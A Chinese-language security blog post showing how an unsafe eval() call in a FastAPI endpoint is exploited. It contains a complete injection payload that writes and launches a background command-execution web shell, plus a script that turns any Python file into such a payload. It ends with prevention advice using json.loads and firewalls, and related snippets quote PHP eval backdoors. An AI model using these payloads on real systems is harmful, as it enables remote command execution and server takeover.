针对`Python3`下Web框架不安全方法`eval()`的代码注入攻击

最新推荐文章于 2023-06-17 10:49:28 发布
最新推荐文章于 2023-06-17 10:49:28 发布
阅读量561 收藏
点赞数
分类专栏: 网络安全 文章标签: 安全 python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62579137/article/details/130504143
版权

针对Python3下Web框架不安全方法eval()的代码注入攻击

概览

Python3中,使用eval()方法可以简单粗暴的把json字符串转成字典, 很多新手在刚刚入门web开发的时候常用这种方法. 但这种方法也可以用来执行一串命令, 虽然方法受到了限制比如不能在其中执行赋值语句等等.

以下是一个演示根据eval()方法不安全使用的一种攻击, 通过注入代码, 搭建一个简易的Web Shell, 为了方便, 使用FastAPI 框架进行演示, 因为其自带测试用的接口文档, 可直接在其中进行接口访问. 只需安装Python3FastAPI 模块即可复现这个例子.

原理

eval() 是 Python 的内置函数,用于动态执行字符串形式的 Python 代码。尽管 eval() 的功能强大,但其不安全性也使其成为潜在的攻击目标。当 eval() 函数用于处理用户输入或外部数据时,攻击者可以通过构造恶意代码来执行任意命令。

FastAPI服务端演示代码

这里在8001端口下/json_prase接口使用了不安全的json加载方法, 代码如下:

#server.py
import json
import os
from fastapi import FastAPI
from pydantic import BaseModel
import subprocess
import time
app = FastAPI()
'''
...

'''
class Request(BaseModel):
    request: str

@app.post('/json_prase/')
async def execute_command(request: Request):
    return eval(request.request)
import uvicorn
uvicorn.run(app,port=8001,host='0.0.0.0')

按照正常的使用方式, 大概是这样, 也就是发一串json过去,服务端解析json,然后干一些什么事情.

image-20230505110907261

攻击

如果我发这个呢?

{
  "request": "os.system(\"echo \\\"from fastapi import FastAPI\\\\nfrom pydantic import BaseModel\\\\nimport subprocess\\\\napp = FastAPI()\\\\nclass Command(BaseModel):\\\\n    cmd: str\\\\n@app.post('/execute/')\\\\nasync def execute_command(command: Command):\\\\n    try:\\\\n        output = subprocess.check_output(command.cmd, shell=True, stderr=subprocess.STDOUT, text=True)\\\\n    except subprocess.CalledProcessError as e:\\\\n        output = e.output\\\\n    return {'output': output}\\\\nimport uvicorn\\\\nuvicorn.run(app, host='0.0.0.0', port=8000,log_level='critical')\\\" > t.py ; chmod +x t.py; python3 t.py&\")"
}

其实就是让它执行了一段代码,如下:

from fastapi import FastAPI
from pydantic import BaseModel
import subprocess
app = FastAPI()
class Command(BaseModel):
    cmd: str
@app.post('/execute/')
async def execute_command(command: Command):
    try:
        output = subprocess.check_output(command.cmd, shell=True, stderr=subprocess.STDOUT, text=True)
    except subprocess.CalledProcessError as e:
        output = e.output
    return {'output': output}
import uvicorn
uvicorn.run(app, host='0.0.0.0', port=8000,log_level='critical')

因为在eval()方法下不能执行赋值语句,不能执行导入,于是乎以写入文件在通过shell执行.

运行效果:

image-20230505112744290

直接在web的测试页面里就可以执行shell命令了, 可以看到返回的结果. 而且因为是后台运行的, 即使是关闭了也不会退出.

直接把代码手动转成字符串太费劲了, 可以先手写文件, 然后运行脚本把文件转成这种字符串.

import os
def python_file_to_string(filepath):
    with open(filepath, "r") as file:
        content = file.read()

    lines = content.split("\n")
    escaped_lines = [line.replace("\\", "\\\\").replace("\"", "\\\"") for line in lines]
    escaped_content = "\\\\n".join(escaped_lines)
    final_string = f"os.system(\"echo \\\"{escaped_content}\\\" > t.py ; chmod +x t.py; python3 t.py&\")"
    
    return final_string



app_code = python_file_to_string("fastapi_app.py")
print(app_code)

# eval(app_code)

然后把这个打印出来的字符串通过请求的方式注入到指定的接口就好了.

局限

目前, 这个漏洞的利用存在许多的局限, 如下:

  • 使用Python3
  • 在某个能被找到的接口中使用eval()方法进行解析
  • 引入了os模块
  • 防火墙放行了其它端口

预防

  1. 使用安全的json.loads()方法加载字典:
#server.py
import json
import os
from fastapi import FastAPI
from pydantic import BaseModel
import subprocess
import time
app = FastAPI()
'''
...

'''
class Request(BaseModel):
    request: str

@app.post('/json_prase/')
async def execute_command(request: Request):
    return json.loads(request.request)
import uvicorn
uvicorn.run(app,port=8001,host='0.0.0.0')

这里看到使用后再碰到一样的请求就抛异常了,而不是直接傻乎乎的执行.

image-20230505114206864

  1. 防火墙默认不开放所有端口, 只开放需要使用的端口. 一般服务器厂商会用两重防火墙, 一层是操作系统以外的, 一层是操作系统上的.
ryan润
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python3eval函数用法使用简介
01-21
pythoneval函数的用法十分的灵活,这里主要介绍一下它的原理和一些使用的场合。 下面是从python的官方文档中的解释:  The arguments are a string and optional globals and locals. If provided, globals must ...
【Shell 命令集合 系统设置 】Linux 将参数作为命令行输入 eval命令 使用指南
探索C++编程的奥秘,分享深入的技术见解和实践,旨在激发读者创造力与解决问题的思维。
06-28 2219
在Linux中,eval命令用于将参数作为命令行输入,并将其作为命令进行解析和执行。它的作用是将字符串作为命令执行,从而实现动态执行命令的目的。
代码&命令注入漏洞
niqiu320的博客
04-27 1302
代码注入漏洞简介 漏洞成因 由于服务端存在执行的函数,在使用的过程中没有做好一个严格的控制,造成了实际的参数在客户端中可控。 漏洞危害 敏感信息泄露 webshell获取 命令执行 任意文件读取 权限提升 … 代码执行相关函数 eval()(静态调用): 把字符串code作为PHP代码执行 该字符串必须是合法的PHP代码,且必须以分号结尾。 assert()(<php7动态调用) : assert():判断是否为字符串,是则当成代码执行,实际它是PHP中的断言, 断言就是用于在代码中捕捉这些假设,可
1.深入代码/命令注入
qq_37027540的博客
10-23 465
1.深入代码/命令注入 由于没有针对代码中可执行的特殊函数入口做过滤,导致用户可以提交恶意语句,并交由服务器端执行。 代码/命令注入攻击Web服务器没有过滤类似 system(),eval(),exec()等函数的传入参数。 代码注入 eval(string code) eval把字符串作为PHP代码执行 Code_str是PHP代码字符串,需要是一个完整的语句(结尾需要加分号)一句话木马就...
代码执行漏洞
heiseweiye的博客
09-27 7612
简述代码执行漏洞: PHP代码执行漏洞可以将代码注入到应用中,最终到webserver去执行。该漏洞主要存在于eval()、assert()、preg_replace()、call_user_func()、array_map()以及动态函数中。 1.eval和assert函数 1.1 eval()函数是将输入的字符串当做PHP代码执行,assert()会检查指定的 assertion 并在结果...
pythoneval_python命令注入威胁之eval()
weixin_39907526的博客
11-25 567
小G@北京 2012/5/15 19:23eval函数是python最常用于做序列化、反序列化的函数,有些人就会把外部输入的数据,eval一下变成对象,但你不做任何过滤就执行eval的时候可知道,你变成一个很初级的码农了。命令执行的场景如下:code ="""__import__('os').system('echo 1')"""eval(code)101234code="""__import__...
函数注入攻击
要啥啥不行,偷懒第一名
10-21 1772
实验目的与要求 1.了解eval注入的概念 2.了解eval注入攻击的方式 3.掌握防范攻击方法 预备知识 eval注入攻击    Eval函数会将输入的字符串参数作为PHP程序代码来执行,用户可以将PHP程序代码保存在数据库的字段中,然后读入到eval函数中来执行。    Eval函数的用法如下: mixed eval ( string code_str )    code str是代码字符串,eval注入(eval injection)攻击发生在黑客能够控制eval函数...
PHP代码函数的执行漏洞
知足且坚定,温柔且上进
04-07 1691
eval函数 eval()函数可以将参数中的变量值执行,通常处于处理模板和动态加载PHP代码,但也常常被攻击者利用,比如一句话后门程序: <?php eval($_GET[cmd])?> assert()函数 assert()函数在PHP中用来判断一个表达式是否成立,返回真或假。如果直接将PHP代码传入也会被执行。 <?php assert($_GET["cmd"]);?&g...
Pythoneval 的用法
热门推荐
ajie957的博客
09-14 4万+
eval函数主要是用来实现python中各种数据类型与str之间的转换,下面会详细的举出实例来帮助理解 一 eval( )函数的基本用法 (1)字符串转换为列表 b=eval(a) print(a) print(b) print(type(a)) print(type(b)) 输出结果如下 可见eval将原本为字符串类型的a转换为list列表类型的b (2)将字符串转换为字典 a='{"number":2,"name":"jay"}' b=eval(a)...
WEB 安全—深入学习命令执行漏洞
Beret-81的博客
06-17 907
命令执行上下文中,|、||、& 和 && 是用于控制命令执行的操作符。它们在使用和行为上有所不同:管道操作符 |:作用:将前一个命令的输出作为后一个命令的输入,用于连接多个命令的执行结果。示例:command1 | command2,将 command1 的输出作为 command2 的输入。逻辑或操作符 ||:作用:用于在命令执行时,只有前一个命令执行失败(返回非零退出状态码)时才执行后续的命令
#笔记(二十九)#csrf漏洞小结
vircorns的博客
02-23 237
攻击原理 用户C打开浏览器,访问受信任网站A,输入用户名和密码请求登录网站A; 在用户信息通过验证后,网站A产生Cookie信息并返回给浏览器,此时用户登录网站A成功,可以正常发送请求到网站A; 用户未退出网站A之前,在同一浏览器中,打开一个TAB页访问网站B; 网站B接收到用户请求后,返回一些攻击代码,并发出一个请求要求访问第三方站点A; (网站B对网站A发出一个请求的同时,浏览器也会把网站...
python3爬取淘宝信息代码分析
01-20
# 得到你传入的URL链接 设置超时时间3秒 r = requests.get(url, timeout=3) # 判断它的http状态码 r.raise_for_status() # 设置它的编码 encoding是设置它的头部编码 apparent_encoding是从返回网页
Pythoneval带来的潜在风险代码分析
12-23
0x00 前言 evalPython用于执行python表达式的一个内置函数,使用eval,可以很方便的将字符串动态执行。比如下列代码: >>> eval(...当然,eval只能执行Python的表达式类型的代码,不能直接用它进行im
python3中的eval和exec的区别与联系
09-18
主要介绍了python3中的eval和exec的区别与联系,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
Python学习笔记整理3之输入输出、python eval函数
12-24
python中的变量声明不需要像C++、Java那样指定变量数据类型(int、float等),因为python会自动地根据赋给变量的值确定其类型。如 radius = 20,area = radius * radius * 3.14159 ,python会自动的将radius看成...
CTFHub_技能树_Web之RCE——“eval执行”、“命令注入
Ho1aAs‘s Blog
07-23 8670
文章目录一、eval执行二、命令注入完 –>CTFHub传送门<– 一、eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> PHP代码显示,要求将命令赋值给cmd然后执行 先查看一下根目录文件 /?cmd=system("ls"); !切记最后的分号不可省略! 没有需要的文件 看看上一级的文件夹 /
【PHP注入01】PHP语言常见可注入函数(eval、assert、preg_replace、call_user_func、$a($b)等)
Fighting_hawk的博客
02-26 3806
1. 掌握PHP语言种几种可能存在注入的函数; 2. 结合SQL注入与XSS漏洞思考PHP注入绕过手法。
1-Web安全——命令执行注入攻击
网络安全
09-06 6957
1. 系统命令执行 通常在程序开发过程中,应用程序需要调用一些外部程序时会用到一些系统命令相关函数。 例如在linux系统中,shell解释器就是用户和系统进行交互的一个接口,对用户的输入进行解析并在系统中执行。而shell脚本语言就是linux系统由各种shell命令组成的程序,具有其他普通编程的很多特点。 2. Web命令执行 常用的ASP,PHP,JSP等web脚本解释语言支持动态执行在运行时生成的代码这种特点,可以帮助开发者根据各种数据和条件动态修改程序代码,这对于开发人员来说是有利的.
Python黑客攻击的几种技术,你得了解一下
weixin_34018169的博客
04-26 2551
2019独角兽企业重金招聘Python工程师标准>>> ...
python安全eval
最新发布
11-23
Python中,eval函数的使用非常灵活,但也非常危险,因为它可以执行任意代码。为了避免eval函数的安全问题,可以使用ast.literal_eval()函数来代替eval函数。ast.literal_eval()函数只能计算包含字面值的表达式,例如字符串,数字,元组,列表,字典和布尔值。它不能计算包含变量或函数调用的表达式,因此更加安全。 以下是一个使用ast.literal_eval()函数的例子: ```python import ast s = "[1, 2, 3]" lst = ast.literal_eval(s) print(lst) # 输出:[1, 2, 3] ``` 在上面的例子中,我们使用ast.literal_eval()函数将字符串s转换为列表lst。由于s只包含字面值,因此ast.literal_eval()函数可以安全地计算它。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值